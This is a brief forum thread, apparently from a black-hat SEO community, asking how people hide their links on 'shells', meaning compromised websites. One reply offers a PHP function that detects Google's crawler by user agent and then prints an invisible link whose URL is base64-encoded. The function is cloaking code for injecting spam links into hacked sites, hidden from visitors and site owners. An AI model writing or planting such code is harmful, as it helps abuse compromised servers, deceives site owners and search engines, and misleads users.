How do you hide your links on shells(after october 2013)

pvtzahar

Newbie
Joined
Jun 19, 2013
Messages
26
Reaction score
9
How do you hide your links on shells(after october 2013)?
Share your experiences on this topic.
 
It's my variant of hiding.

function load($page,$action)
{
if(stristr($_SERVER["HTTP_USER_AGENT"],"google")&&($action=="start"))
{echo '<a style="visibility: hidden;position:absolute;" href="'.base64_decode($page).'">'.base64_decode($page).'</a>';}


}
 
Back
Top